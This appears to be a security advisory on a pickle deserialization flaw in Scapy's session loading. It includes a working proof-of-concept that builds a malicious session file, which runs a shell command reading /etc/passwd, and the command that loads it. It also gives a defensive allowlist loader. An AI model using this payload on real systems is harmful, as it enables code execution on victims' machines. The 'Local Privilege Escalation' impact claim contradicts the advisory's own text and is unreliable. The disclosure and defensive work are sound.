The vulnerability lies in the unsafe deserialization of session files in Scapy versions prior to 2.7.0. When a user loads a session file with the `-s` command-line option, the `load_session` function in `main.py` is invoked. That function calls Python's `pickle.load()` on the gzip-compressed file without any validation. The pickle format is inherently unsafe for untrusted input because it can instantiate arbitrary objects and call arbitrable callables. An attacker can craft a payload by defining a class whose `__reduce__` method returns a callable and its arguments, such as an OS command. When that payload is compressed into a `.pkl.gz` file and loaded via `./run_scapy -s ./evil.pkl.gz`, the `__reduce__` callable runs immediately during deserialization, giving arbitrary code execution with the privileges of the user running Scapy.
Platform: Scapy
Version: <2.7.0
Vulnerability: Insecure Deserialization
Severity: Medium
Date: 2024
Prediction: 2024-02-15
What Undercode Say:
Loading the crafted session file (the command from the advisory):

```shell
./run_scapy -s ./evil.pkl.gz
```

Proof-of-concept generator for the malicious session file, as given in the advisory (the `__reduce__` name was garbled to `<strong>reduce</strong>` by the page's markdown rendering and is restored here):

```python
import gzip
import os
import pickle


class RCE:
    # pickle calls __reduce__ when serializing; on load, the returned
    # callable is invoked with the returned arguments, here os.system(...)
    def __reduce__(self):
        return (os.system, ("cat /etc/passwd",))


# Scapy expects a gzip-compressed pickle, so compress the serialized object
payload = gzip.compress(pickle.dumps(RCE()))
with open("evil.pkl.gz", "wb") as f:
    f.write(payload)
```
How it is exploited:
The attacker creates a malicious `.pkl.gz` file containing a serialized object whose `__reduce__` result is a command. The victim is tricked into loading this file with the Scapy `-s` option. On load, the embedded callable executes automatically during unpickling.
Protection from this CVE
Upgrade to Scapy v2.7.0. Avoid using the `-s` session option. Never load untrusted session files.
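A defender-side check to put in front of a pickle-based session loader, added here as an illustration; it is not Scapy's own code and does not reproduce the 2.7.0 fix. It walks the opcode stream with `pickletools` (nothing is executed), refuses any `module.name` global outside an allowlist, and only then unpickles through a restricted `Unpickler`. The allowlist contents, the `_Probe` class and the two sample sessions are assumptions constructed for the demonstration.

```python
import gzip
import io
import os
import pickle
import pickletools

def scan_pickle(data: bytes) -> set:
    """Walk the opcode stream with pickletools (nothing is executed) and return every
    module.name global the pickle would import; a session of plain data references none."""
    refs, strings = set(), []
    for op, arg, _ in pickletools.genops(data):
        if op.name == "GLOBAL":                       # protocol <= 3: arg is "module name"
            refs.add(arg.replace(" ", ".", 1))
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)                       # pushed strings feed STACK_GLOBAL
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:
            refs.add(f"{strings[-2]}.{strings[-1]}")  # protocol 4+: last two strings pushed
    return refs

class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist unpickler: a global not listed here is refused before it is imported."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}
    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused global {module}.{name}")

def refused_globals(data: bytes) -> list:
    """Globals the static scan finds outside the allowlist; an empty list means clean."""
    return sorted(scan_pickle(data) - {f"{m}.{n}" for m, n in RestrictedUnpickler.ALLOWED})

def load_session_bytes(data: bytes):
    """Static scan first, then allowlisted unpickling; raises UnpicklingError otherwise."""
    bad = refused_globals(data)
    if bad:
        raise pickle.UnpicklingError(f"refused globals: {bad}")
    return RestrictedUnpickler(io.BytesIO(data)).load()

def load_session_file(path: str):  # same shape as a `-s` loader: gunzip, then check and load
    with gzip.open(path, "rb") as f:
        return load_session_bytes(f.read())

class _Probe:
    """Constructed stand-in for a hostile session object; its __reduce__ makes the pickle call
    os.getcwd (harmless). The stream names the module 'posix' or 'nt', never 'os'."""
    def __reduce__(self):
        return (os.getcwd, ())

BENIGN_SESSION = pickle.dumps({"pkts": [1, 2, 3], "name": "capture"})  # constructed sample
SUSPECT_SESSION = pickle.dumps(_Probe())                                 # constructed sample
```

Because the pickle names the callable's real module (`posix.getcwd`, not `os.getcwd`), a denylist keyed on `os` would miss it; that is why the check is an allowlist.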
Impact:
Arbitrary Code Execution. Local Privilege Escalation.
Sources:
Reported By: github.com